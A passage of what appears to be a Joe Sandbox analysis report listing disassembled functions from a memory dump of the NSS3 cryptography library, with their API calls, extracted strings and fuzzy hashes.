SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C5F5F7D

Part of subcall function 6C5F5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C5F5F82,8B4274C0), ref: 6C5F5248
Part of subcall function 6C5F5220: EnterCriticalSection.KERNEL32(0F6C6C0D,?,6C5F5F82,8B4274C0), ref: 6C5F525C
Part of subcall function 6C5F5220: PR_SetError.NSS3(00000000,00000000), ref: 6C5F528E
Part of subcall function 6C5F5220: PR_Unlock.NSS3(0F6C6BF1), ref: 6C5F5299
Part of subcall function 6C5F5220: free.MOZGLUE(00000000), ref: 6C5F52A9

Strings

q]_l, xrefs: 6C5F5EDB, 6C5F5F09

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]_l
API String ID: 3150690610-4018457070
Opcode ID: 5165d6dbef3810127e5ea5a070692cb4b2bddae43bddd4768a0405c0740b79bf
Instruction ID: 73f9ff7a6f596f2c2126ae3e686c8bde53f30489fda7e91840e86774c752cf2a
Opcode Fuzzy Hash: 5165d6dbef3810127e5ea5a070692cb4b2bddae43bddd4768a0405c0740b79bf
Instruction Fuzzy Hash: 7E210AF1D002049FEB149F64EC416EFBBB4EF49308F544029E91AA7701EB319958CBD5

Function 6C5B8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C5C124D,00000001), ref: 6C5B8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C5C124D,00000001), ref: 6C5B8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8D73
PR_Unlock.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8D8C

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8DBA

Strings

KRAM, xrefs: 6C5B8D3E
KRAM, xrefs: 6C5B8CF9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: d9cf3566258362499c43b96a81ef8ad157bd3a9adb8fc12b755d20a6f2c3102c
Instruction ID: 516978428716093cd040ec48da78ebf995ae4887868f3e2c3e8f340a519bc57f
Opcode Fuzzy Hash: d9cf3566258362499c43b96a81ef8ad157bd3a9adb8fc12b755d20a6f2c3102c
Instruction Fuzzy Hash: F121A1B5A04602CFCB00EF79C89455ABBF0FF45318F15896BD99997701DB30D841CB92

Function 6C6B0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C6B0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C6B0EFA

Part of subcall function 6C59AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C59AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F2B

Strings

Aborting, xrefs: 6C6B0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C6B0ED9, 6C6B0EE5, 6C6B0F06, 6C6B0F0B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: ebb0575c473ff1ea33d7470475006732366f504b8817f220dcf6f15524bfd90a
Instruction ID: 3e856e0baa370f93de1b6688ce370b167014efd969db3792465f9886b2201cb6
Opcode Fuzzy Hash: ebb0575c473ff1ea33d7470475006732366f504b8817f220dcf6f15524bfd90a
Instruction Fuzzy Hash: CC01ADB6A00204BBDF11AF65EC8589B3F6DEF46368F004065FD1A97601D631EE2087AA

Function 6C691C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Yl,?,?,6C594E1D), ref: 6C691C8A
sqlite3_free.NSS3(00000000), ref: 6C691CB6

Strings

a CHECK constraint, xrefs: 6C691C76, 6C691C81
w=Yl, xrefs: 6C691C44
a generated column, xrefs: 6C691C6C
an index, xrefs: 6C691C67
non-deterministic use of %s() in %s, xrefs: 6C691C85

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Yl
API String ID: 1840970956-2161169664
Opcode ID: 92923ac81866f5286ddd57a2dda09aff872f332ce378ce75e1a0592c5cd0e24e
Instruction ID: 247df7339d73646197c5e0c7b5d9a7926cf29d4643b22dce6894a1d9d97b5cc6
Opcode Fuzzy Hash: 92923ac81866f5286ddd57a2dda09aff872f332ce378ce75e1a0592c5cd0e24e
Instruction Fuzzy Hash: 0B014CB5A001049BD700BF2CD84297177E5EFC634CB15086DDC458BB52EB31EC56C755

Function 6C674D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C674DE0

Strings

invalid, xrefs: 6C674DB8
%s at line %d of [%.10s], xrefs: 6C674DDA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C674DCB
API call with %s database connection pointer, xrefs: 6C674DBD
misuse, xrefs: 6C674DD5

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 1ac1ced969a1bb2b16d60df67a9a5bcaa05f6a6eccbc1e2c28d3a929b61612f2
Instruction ID: 2eb1289bfd0f66bf9187a9419378cca65a69f056fe1cf514a66f9de65d8fec36
Opcode Fuzzy Hash: 1ac1ced969a1bb2b16d60df67a9a5bcaa05f6a6eccbc1e2c28d3a929b61612f2
Instruction Fuzzy Hash: 50F05921F085246BE7105015DE28FE733D54F02329F470DA1ED446BE93D24ABC508AED

Function 6C674DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C674E4D

Strings

invalid, xrefs: 6C674E25
%s at line %d of [%.10s], xrefs: 6C674E47
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C674E38
API call with %s database connection pointer, xrefs: 6C674E2A
misuse, xrefs: 6C674E42

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a8045c8905c8a7b446ff130ca8ceb45c61c795945591d4802f8e96ecbf465385
Instruction ID: 3aa69f06d319f9493e1ab1a8857bca76665f5b1752930fee05f4c514d4846878
Opcode Fuzzy Hash: a8045c8905c8a7b446ff130ca8ceb45c61c795945591d4802f8e96ecbf465385
Instruction Fuzzy Hash: 0AF02E11F489186BE63052159C18FF737854B0133AF4A4CA1EA0467E93D749AC735AFD

Function 6C5A9FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5AA086
EnterCriticalSection.KERNEL32(?), ref: 6C5AA09B
PR_Unlock.NSS3(?), ref: 6C5AA0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AA0E9
TlsGetValue.KERNEL32 ref: 6C5AA11B
EnterCriticalSection.KERNEL32(?), ref: 6C5AA12F
PR_Unlock.NSS3(?), ref: 6C5AA148

Part of subcall function 6C5C1A40: PR_Now.NSS3(?,00000000,6C5A28AD,00000000,?,6C5BF09A,00000000,6C5A28AD,6C5A93B0,?,6C5A93B0,6C5A28AD,00000000,?,00000000), ref: 6C5C1A65

Part of subcall function 6C5C1940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C5C4126,?), ref: 6C5C1966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AA1A3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 74a902ff2c068176366164e7d036997c728cb35340cb916a3e510a81b351ccb1
Instruction ID: 3182e5bca730b11291953bc25aadc6811210e072071736bb9d2e7e27513670d1
Opcode Fuzzy Hash: 74a902ff2c068176366164e7d036997c728cb35340cb916a3e510a81b351ccb1
Instruction Fuzzy Hash: 6851C8B5A00201ABEB109FABDC44AAF77B9BF86308F15852DDC1997701EF31D946CA91

Function 6C5E0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?,?,00000000,?,?), ref: 6C5E0CB3

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?), ref: 6C5E0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?), ref: 6C5E0DEC

Part of subcall function 6C600F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5A2AF5,?,?,?,?,?,6C5A0A1B,00000000), ref: 6C600F1A
Part of subcall function 6C600F10: malloc.MOZGLUE(00000001), ref: 6C600F30
Part of subcall function 6C600F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C600F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000), ref: 6C5E0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?,?,00000000), ref: 6C5E0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0E79

Part of subcall function 6C5F1560: TlsGetValue.KERNEL32(00000000,?,6C5C0844,?), ref: 6C5F157A
Part of subcall function 6C5F1560: EnterCriticalSection.KERNEL32(?,?,?,6C5C0844,?), ref: 6C5F158F
Part of subcall function 6C5F1560: PR_Unlock.NSS3(?,?,?,?,6C5C0844,?), ref: 6C5F15B2

Part of subcall function 6C5BB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C5C1397,00000000,?,6C5BCF93,5B5F5EC0,00000000,?,6C5C1397,?), ref: 6C5BB1CB
Part of subcall function 6C5BB1A0: free.MOZGLUE(5B5F5EC0,?,6C5BCF93,5B5F5EC0,00000000,?,6C5C1397,?), ref: 6C5BB1D2

Part of subcall function 6C5B89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5B88AE,-00000008), ref: 6C5B8A04
Part of subcall function 6C5B89E0: EnterCriticalSection.KERNEL32(?), ref: 6C5B8A15
Part of subcall function 6C5B89E0: memset.VCRUNTIME140(6C5B88AE,00000000,00000132), ref: 6C5B8A27
Part of subcall function 6C5B89E0: PR_Unlock.NSS3(?), ref: 6C5B8A35

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 98925f0d9da71f1d26eee753076a8d224c080f6ef3dc992354587e9e23781f1d
Instruction ID: eccd63aab8cf4ee7a42015871c603cb38dad301bd6aa53c07ec8cdb2094ec24a
Opcode Fuzzy Hash: 98925f0d9da71f1d26eee753076a8d224c080f6ef3dc992354587e9e23781f1d
Instruction Fuzzy Hash: 535196F6E002019FEB009F64DD81AAB37A89F8921CF150475EC1997712FF31ED1997A6

Function 6C596E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C596ED8
sqlite3_value_text.NSS3(?,?), ref: 6C596EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C596FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C596FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C596FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C597010
sqlite3_value_blob.NSS3(?,?), ref: 6C59701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C597052

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 576a9bb712dd1f221f670df5efd3606de18f1aa4ca5585fe6575e9f65f375603
Instruction ID: f3fac11181dc5d3ff6fdb69f60c2ad4e63ec6cf5677440dabe3e1b0003e1e2a5
Opcode Fuzzy Hash: 576a9bb712dd1f221f670df5efd3606de18f1aa4ca5585fe6575e9f65f375603
Instruction Fuzzy Hash: B961F7B1E1428ACFDB40CF65CC107EEB7B2AF85308F1841A5D416ABB54EB369D19CB91

Function 6C608F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C607313), ref: 6C608FBB

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C607313), ref: 6C609012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C607313), ref: 6C60903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C60909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C6090DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C6090F1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C607313), ref: 6C60906B

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C607313), ref: 6C609128

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 4c719e93695fc10708bd9705c62f3789377c59be90afe47a8cce2c767d7092c9
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 4651E971B002018FEB18CF69DE44B56B3F6AF4535CF154069E916E7B62EB32E804CB99

Function 6C5B9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C5C0715), ref: 6C5B8859
Part of subcall function 6C5B8850: PR_NewLock.NSS3 ref: 6C5B8874
Part of subcall function 6C5B8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C5B888D

PR_NewLock.NSS3 ref: 6C5B9CAD

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

TlsGetValue.KERNEL32 ref: 6C5B9CE8
EnterCriticalSection.KERNEL32(?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D01
TlsGetValue.KERNEL32(?,?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D38
EnterCriticalSection.KERNEL32(?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D4D
PR_Unlock.NSS3 ref: 6C5B9D70
PR_Unlock.NSS3 ref: 6C5B9DC3
PR_NewLock.NSS3 ref: 6C5B9DDD

Part of subcall function 6C5B88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5C0725,00000000,00000058), ref: 6C5B8906
Part of subcall function 6C5B88D0: EnterCriticalSection.KERNEL32(?), ref: 6C5B891A
Part of subcall function 6C5B88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C5B894A
Part of subcall function 6C5B88D0: calloc.MOZGLUE(00000001,6C5C072D,00000000,00000000,00000000,?,6C5C0725,00000000,00000058), ref: 6C5B8959
Part of subcall function 6C5B88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8993
Part of subcall function 6C5B88D0: PR_Unlock.NSS3(?), ref: 6C5B89AF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

